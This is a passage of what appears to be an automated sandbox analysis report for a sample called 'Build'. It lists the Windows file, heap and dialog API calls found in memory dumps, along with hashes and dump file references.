                                                                                                                                                                                • Opcode Fuzzy Hash: 8b3f25a04298d831b779f398631b60cd2d3c382eefe84b994af51a9540bac766
                                                                                                                                                                                • Instruction Fuzzy Hash: 56512578E002059EDB268F75C8856BEBBE5EF41300F1444EEE0A68B351D73DE946CB94
                                                                                                                                                                                APIs
                                                                                                                                                                                • SetFilePointer.KERNELBASE(000000FF,?,00000800,?,?,00000000,?,?,00B4B43B,00000800,00000800,00000000,?,?,00B4A31D,?), ref: 00B4B5EB
                                                                                                                                                                                • GetLastError.KERNEL32(?,?,00B4A31D,?,?,?,?,?,?,?,?), ref: 00B4B5FA
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ErrorFileLastPointer
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2976181284-0
                                                                                                                                                                                • Opcode ID: 955a9d9a9e0c4b2e3194860f24a102e04838bbebbbf4896f4239914ed2b36366
                                                                                                                                                                                • Instruction ID: e913201b9b27562428dec62f3b4e3fb43f501e0018a2d8c0317b0468a6ca9bf2
                                                                                                                                                                                • Opcode Fuzzy Hash: 955a9d9a9e0c4b2e3194860f24a102e04838bbebbbf4896f4239914ed2b36366
                                                                                                                                                                                • Instruction Fuzzy Hash: DF41F531604345CBDB249F65C4D4DBAB3E5FF68320F1049A9EA4683342DBB4DE80AB91
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00B6B9A5: GetLastError.KERNEL32(?,00B850C4,00B66E12,00B850C4,?,?,00B6688D,?,?,00B850C4), ref: 00B6B9A9
                                                                                                                                                                                  • Part of subcall function 00B6B9A5: _free.LIBCMT ref: 00B6B9DC
                                                                                                                                                                                  • Part of subcall function 00B6B9A5: SetLastError.KERNEL32(00000000,?,00B850C4), ref: 00B6BA1D
                                                                                                                                                                                  • Part of subcall function 00B6B9A5: _abort.LIBCMT ref: 00B6BA23
                                                                                                                                                                                  • Part of subcall function 00B6E19E: _abort.LIBCMT ref: 00B6E1D0
                                                                                                                                                                                  • Part of subcall function 00B6E19E: _free.LIBCMT ref: 00B6E204
                                                                                                                                                                                  • Part of subcall function 00B6DE0B: GetOEMCP.KERNEL32(00000000,?,?,00B6E094,?), ref: 00B6DE36
                                                                                                                                                                                • _free.LIBCMT ref: 00B6E0EF
                                                                                                                                                                                • _free.LIBCMT ref: 00B6E125
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _free$ErrorLast_abort
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2991157371-0
                                                                                                                                                                                • Opcode ID: 992fe1fa0cde9adc39a7e12867f101aa3fab5c5dda55f670bd2a3885b63420f3
                                                                                                                                                                                • Instruction ID: f2615f2e6bade9964037c6dc5fc0017aa7df6f8d18a14f3076697fce2c40ce20
                                                                                                                                                                                • Opcode Fuzzy Hash: 992fe1fa0cde9adc39a7e12867f101aa3fab5c5dda55f670bd2a3885b63420f3
                                                                                                                                                                                • Instruction Fuzzy Hash: 3E31A235904208AFDB10EFA9D442BAD77F5EF41320F2540E9E5249B2A1EFBA9D81DB50
                                                                                                                                                                                APIs
                                                                                                                                                                                • CreateFileW.KERNELBASE(?,?,00000000,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00B4B967,?,?,00B487FD), ref: 00B4B0A4
                                                                                                                                                                                • CreateFileW.KERNEL32(?,?,00000000,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00B4B967,?,?,00B487FD), ref: 00B4B0D4
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CreateFile
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 823142352-0
                                                                                                                                                                                • Opcode ID: 215dbc1bed9d0d28c7409f92faf57bb7c9a61eb7f84d1cab4aedd78d58cad25b
                                                                                                                                                                                • Instruction ID: c484e13f11b8ecc91aafa1be1e1cc097bedb521ba4e6a2b04e92a6e0bafa8acc
                                                                                                                                                                                • Opcode Fuzzy Hash: 215dbc1bed9d0d28c7409f92faf57bb7c9a61eb7f84d1cab4aedd78d58cad25b
                                                                                                                                                                                • Instruction Fuzzy Hash: 19216F71504344AFE3309F29CC85FB7B7DCEB58321F004A59FAA5C62D1D774AA489661
                                                                                                                                                                                APIs
                                                                                                                                                                                • FlushFileBuffers.KERNEL32(?), ref: 00B4B7FC
                                                                                                                                                                                • SetFileTime.KERNELBASE(?,?,?,?), ref: 00B4B8B0
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: File$BuffersFlushTime
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1392018926-0
                                                                                                                                                                                • Opcode ID: c14ebc7a653d50fdf3f7df87728178745d07494b6145997d628ec02495931e62
                                                                                                                                                                                • Instruction ID: b9c4590d7ec437d693379227fd182b8ce0e723acee86417d53ca9cc8c467d569
                                                                                                                                                                                • Opcode Fuzzy Hash: c14ebc7a653d50fdf3f7df87728178745d07494b6145997d628ec02495931e62
                                                                                                                                                                                • Instruction Fuzzy Hash: 8121E431248241DBC715DF24C891EBBBBE8EF95304F08499CF9C587141D729DA0CE762
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: H_prolog3_wcslen
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3746244732-0
                                                                                                                                                                                • Opcode ID: 2f043b085af85ddf8dfa11bee142a21b7a8b3bf6e493b6b18dd7e6431579ce4c
                                                                                                                                                                                • Instruction ID: 87a813b05c79d4885fa6fe99c35d42b048679bad902278c1e09bbfd498ffc3d8
                                                                                                                                                                                • Opcode Fuzzy Hash: 2f043b085af85ddf8dfa11bee142a21b7a8b3bf6e493b6b18dd7e6431579ce4c
                                                                                                                                                                                • Instruction Fuzzy Hash: 552128329002199FCF15AF98C895AEDB7F2BF08300F1048A9F445A73A1CB395A55EB64
                                                                                                                                                                                APIs
                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,00000001,00BA60C8,?,?,?,00B66386,00000004,InitializeCriticalSectionEx,00B79624,InitializeCriticalSectionEx,00000000,?,00B6613D,00BA60C8,00000FA0), ref: 00B66215
                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00B6621F
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AddressFreeLibraryProc
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3013587201-0
                                                                                                                                                                                • Opcode ID: b57cbc74a44f3aa827e1ade95591e308f4a10b7df5fc005e4a73663634fe07e0
                                                                                                                                                                                • Instruction ID: 4d41212ca3211591bc77d0221d893b5bfd2e1368c832b65d21f9e352d5027766
                                                                                                                                                                                • Opcode Fuzzy Hash: b57cbc74a44f3aa827e1ade95591e308f4a10b7df5fc005e4a73663634fe07e0
                                                                                                                                                                                • Instruction Fuzzy Hash: FB11B271A012159F8F23CFA4DC9099A77F5FF4676072411A9EA1AE7210EB34ED11CBD0
                                                                                                                                                                                APIs
                                                                                                                                                                                • SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 00B4B907
                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00B4B914
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ErrorFileLastPointer
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2976181284-0
                                                                                                                                                                                • Opcode ID: 5f6e7a482be1019c5a1d3976ee19b2c72e5961a9f868f51c56e9b4d4b87fa666
                                                                                                                                                                                • Instruction ID: 417e36ddd2323694cacfc55096d027875d3bf2b21b858dcd7cf90244c41debdc
                                                                                                                                                                                • Opcode Fuzzy Hash: 5f6e7a482be1019c5a1d3976ee19b2c72e5961a9f868f51c56e9b4d4b87fa666
                                                                                                                                                                                • Instruction Fuzzy Hash: F011A131A00B11ABE7389728C885FA6B3E8EB45370F604AA9E352D75D0D770EE45E750
                                                                                                                                                                                APIs
                                                                                                                                                                                • _free.LIBCMT ref: 00B6BB55
                                                                                                                                                                                  • Part of subcall function 00B6BC8E: RtlAllocateHeap.NTDLL(00000000,?,?,?,00B66A24,?,0000015D,?,?,?,?,00B67F00,000000FF,00000000,?,?), ref: 00B6BCC0
                                                                                                                                                                                • HeapReAlloc.KERNEL32(00000000,?,?,?,?,00B850C4,00B4190A,?,?,00000007,?,?,?,00B41476,?,00000000), ref: 00B6BB91
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Heap$AllocAllocate_free
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2447670028-0
                                                                                                                                                                                • Opcode ID: 47a9c178b4187aa1bd608716fb62d01a41751ae5dce32006948f94e3314d9b84
                                                                                                                                                                                • Instruction ID: dc95769c75edb740499e7ab0cfd0ee1b6614b770a12891fe96c943493b2b66e3
                                                                                                                                                                                • Opcode Fuzzy Hash: 47a9c178b4187aa1bd608716fb62d01a41751ae5dce32006948f94e3314d9b84
                                                                                                                                                                                • Instruction Fuzzy Hash: 45F09C32500215A6DB212E65AC41F6B3BF8DF81B70B1D41FAF815D71A5DF2CDCC145A5
                                                                                                                                                                                APIs
                                                                                                                                                                                • SetFileAttributesW.KERNELBASE(?,00000000,?,00000001,?,00B4BF5E,?,?), ref: 00B4C305
                                                                                                                                                                                  • Part of subcall function 00B4DA1E: _wcslen.LIBCMT ref: 00B4DA59
                                                                                                                                                                                • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00B4BF5E,?,?), ref: 00B4C334
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AttributesFile$_wcslen
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2673547680-0
                                                                                                                                                                                • Opcode ID: 2a804b66554c60e3b6d35c59facf8e0ddb3c4fe44200df771903603a2bba2da1
                                                                                                                                                                                • Instruction ID: 463931d7bc9cbee2ce638b7d99b93f337bf31191b6b9ceab6cb4356c23f31f33
                                                                                                                                                                                • Opcode Fuzzy Hash: 2a804b66554c60e3b6d35c59facf8e0ddb3c4fe44200df771903603a2bba2da1
                                                                                                                                                                                • Instruction Fuzzy Hash: D2F06731601219ABDB00AF658C41AEEB7ECEF08704F40849ABA05E7261DE35DE849BA4
                                                                                                                                                                                APIs
                                                                                                                                                                                • DeleteFileW.KERNELBASE(?,?,?,?,00B4B14B,?,00000000,00B4AF6E,CEEE5757,00000000,00B7517A,000000FF,?,00B48882,?,?), ref: 00B4BC82
                                                                                                                                                                                  • Part of subcall function 00B4DA1E: _wcslen.LIBCMT ref: 00B4DA59
                                                                                                                                                                                • DeleteFileW.KERNEL32(?,?,?,00000800,?,00B4B14B,?,00000000,00B4AF6E,CEEE5757,00000000,00B7517A,000000FF,?,00B48882,?), ref: 00B4BCAE
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: DeleteFile$_wcslen
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2643169976-0
                                                                                                                                                                                • Opcode ID: 91d4de17e9e198c7a5c6ea6489a5cb031632c5ad32141e620992fce01df2c5b6
                                                                                                                                                                                • Instruction ID: e7be821fa88a32dc3f4491de30949999c7a29363ca1d12775816d5705daada28
                                                                                                                                                                                • Opcode Fuzzy Hash: 91d4de17e9e198c7a5c6ea6489a5cb031632c5ad32141e620992fce01df2c5b6
                                                                                                                                                                                • Instruction Fuzzy Hash: 3AF03A35601229AADB019F649D81EEE73ECEF09701B4444A6BA05D3141DF75DE889BA4
                                                                                                                                                                                APIs
                                                                                                                                                                                • _swprintf.LIBCMT ref: 00B60341
                                                                                                                                                                                  • Part of subcall function 00B44C00: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B44C13
                                                                                                                                                                                • SetDlgItemTextW.USER32(00000065,?), ref: 00B60358
                                                                                                                                                                                  • Part of subcall function 00B5D864: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00B5D875
                                                                                                                                                                                  • Part of subcall function 00B5D864: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00B5D886
                                                                                                                                                                                  • Part of subcall function 00B5D864: IsDialogMessageW.USER32(0002043C,?), ref: 00B5D89A
                                                                                                                                                                                  • Part of subcall function 00B5D864: TranslateMessage.USER32(?), ref: 00B5D8A8
                                                                                                                                                                                  • Part of subcall function 00B5D864: DispatchMessageW.USER32(?), ref: 00B5D8B2
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2718869927-0
                                                                                                                                                                                • Opcode ID: 96ee81132a7898718bfca770c432736dadd9eec821bfb54ba953ae942b68a895
                                                                                                                                                                                • Instruction ID: b5addc480ce7d6da42a7e23486803fae9209a39fc29edebd922e8cc2815695a7
                                                                                                                                                                                • Opcode Fuzzy Hash: 96ee81132a7898718bfca770c432736dadd9eec821bfb54ba953ae942b68a895
                                                                                                                                                                                • Instruction Fuzzy Hash: C4F0907191020CAADB01EF69ED06EEE7BEC9B09305F0804D2B605A3262DE349A45CB61
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetFileAttributesW.KERNELBASE(?,?,?,?,00B4BCD4,?,00B48607,?), ref: 00B4BCFA
                                                                                                                                                                                  • Part of subcall function 00B4DA1E: _wcslen.LIBCMT ref: 00B4DA59
                                                                                                                                                                                • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,?,?,00B4BCD4,?,00B48607,?), ref: 00B4BD24
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AttributesFile$_wcslen
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2673547680-0
                                                                                                                                                                                • Opcode ID: 3c27b3f23f36a3546c04875348ab3c0daecdeb261cd3fe073a87816f882a5f7b
                                                                                                                                                                                • Instruction ID: 9a8409a71faaf21e74cac1e99b49612aabf098eb863b57a5a27684c0f810c3d2
                                                                                                                                                                                • Opcode Fuzzy Hash: 3c27b3f23f36a3546c04875348ab3c0daecdeb261cd3fe073a87816f882a5f7b
                                                                                                                                                                                • Instruction Fuzzy Hash: 99F09A35A00218ABCB00EF6899419EEB3E8EB4D760F0405A5EB06E3280DA749E819A91
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetCurrentProcess.KERNEL32(?,?,00000002,00000002,?,00B531C7,00B4D526), ref: 00B53191
                                                                                                                                                                                • GetProcessAffinityMask.KERNEL32(00000000,?,00B531C7), ref: 00B53198
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
